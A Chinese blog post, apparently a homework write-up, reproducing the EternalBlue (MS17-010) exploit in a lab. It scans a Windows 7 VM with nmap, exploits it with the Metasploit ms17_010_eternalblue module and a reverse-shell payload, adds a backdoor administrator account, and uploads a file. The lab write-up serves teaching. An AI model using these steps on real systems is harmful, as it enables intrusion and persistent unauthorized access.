永恒之蓝漏洞复现

已于 2022-04-05 23:23:23 修改
阅读量3.6k 收藏 6
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2022-04-05 23:20:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123979341
版权

简单写一下以前老师布置的作业,如有错误请指正!

一、什么是永恒之蓝

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

二、环境准备

1.一台win7虚拟机作为被攻击机(ip:192.168.47.145),一台kali作为攻击机(ip:192.168.47.130)

2.两台机器可以互相pingt通

3.win7关闭防火墙

三、实验流程

1.打开kali,使用nmap扫描win7是否打开了445端口

nmap -sV -p 445 192.168.47.145

 2.445端口已打开,打开MSF工具,查看是否有永恒之蓝漏洞模块

search ms17_010

3.使用auxiliary/scanner/smb/smb_ms17_010查看是否win7是否存在永恒之蓝,将攻击IP设置为win7IP

4.发现可以利用,使用exploit/windows/smb/ms17_010_eternalblue模块进行攻击

 5.攻击荷载选择payload/generic/shell_reverse_tcp,用来生成shell

 6.配置好攻击IP、攻击荷载,然后run起来

 7.攻击成功,查看当前IP,发现目前确实是win7的ip了

 8.反弹shell

9.添加一个用户hack,密码1234

net user hack 1234 /add

 10.将我们新添加的用户hack添加至管理员用户

net localgroup administrators hack /add

 11.到win7机看一下,发现用户hack确实已经添加上了

 12.向win7上传文件

 13.shell.txt上传成功

还有很多操作大家可以自由发挥~

weixin_48799157
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
永恒之蓝漏洞
m0_73481504的博客
03-26 710
利用漏洞ms17-010漏洞 攻击对方主机进行文件数据的修改需要2台主机 server2008 ,kali第一步,打开两台主机 先要知道被攻击者的ip地址第二步, 打开kali对其ip地址进行扫描扫描ip地址的全部端口 nmap -sV -p- +ip地址nmap -sV -O +ip地址 查看对方系统的版本信息-O识别系统版本-sV 识别具体服务版本扫描到永恒之蓝第三步 ,找到漏洞 利用漏洞启动msf使用ms17_010攻击成功 ps 查看对方开启的进程查看对方主机界面。
永恒之蓝(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)
最新发布
2401_84297796的博客
05-03 777
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
【ms17-010】永恒之蓝漏洞复现
leekos的博客,分享web安全相关知识~
04-04 1772
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况。扫描出来了漏洞,接着我们需要使用工具利用漏洞。这个时候我们已经成功了,远程命令执行。的主机开启,并且显示了开放的端口号。设置完成之后,就可以开始攻击了,使用。分析了相关信息后,我们就可以使用。命令可以查看可以使用哪些命令。(靶机的ip地址),使用。
渗透测试工具-Metasploit使用复现永恒之蓝漏洞
weixin_53440207的博客
02-23 1045
metasploit使用以及复现永恒之蓝漏洞
nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河
m0_59302403的博客
03-22 3441
利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河木马控制靶机,最后用冰河陷阱清除靶机的冰河木马,记一次完整的入侵控制实验。
Windows下的MS17-010(永恒之蓝漏洞分析与复现
热门推荐
dgjkkhcf的博客
07-20 1万+
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用美国国家安全局泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 ,“永恒之蓝”是利用Windows系统的SMB漏洞来获取Windows系统的最高权限。.........
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之蓝漏洞演示
12-22
利用kali linux在windows7上演示永恒之蓝漏洞,有kali实战经验的可以看懂
永恒之蓝漏洞检测工具
10-10
永恒之蓝漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,...
永恒之蓝检测.zip
10-20
"永恒之蓝"是2017年全球范围内爆发的一种著名勒索软件——WannaCry(想哭)的一部分,其主要利用了微软Windows系统中的SMB(Server Message Block)服务漏洞进行传播。该漏洞编号为MS17-010,影响了未打补丁的...
win2012R2永恒之蓝安全补丁.zip
05-12
在网络安全领域,永恒之蓝(EternalBlue)是一个具有里程碑意义的漏洞,它曾被广泛利用于 WannaCry 勒索软件攻击中,对全球范围内的Windows系统造成了严重威胁。Windows Server 2012 R2作为微软的一款企业级服务器...
Windows系统漏洞检测与漏洞利用以及修复(永恒之蓝ms17-010)
薛定谔嘚喵博客
04-25 2539
攻击机:Linux kali(IP:192.168.107.129)靶机:Windows 7 Enterprise (x64)(IP:192.168.107.143)实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。
ms17_010(永恒之蓝漏洞复现
Y1da的博客
09-04 559
一、环境准备 利用VMware安装win7虚拟机x1,kali Liniux虚拟机x1. 二、实验步骤 1.首先利用Nessus对靶机进行扫描(作者的win7需关闭防火墙才能扫出漏洞),扫描结果如下。 这里不难看到我们的靶机存在ms17_010漏洞 2.接下来在终端启动metasploit msfconsole 3.输入以下命令搜索ms17_010漏洞,并在其中找到metasploit的漏洞利用模块exploit/windows/smb/ms17_010_etern...
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 2801
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
永恒之蓝漏洞复现流程
09-01
- *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_39096432/article/details/115422428)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值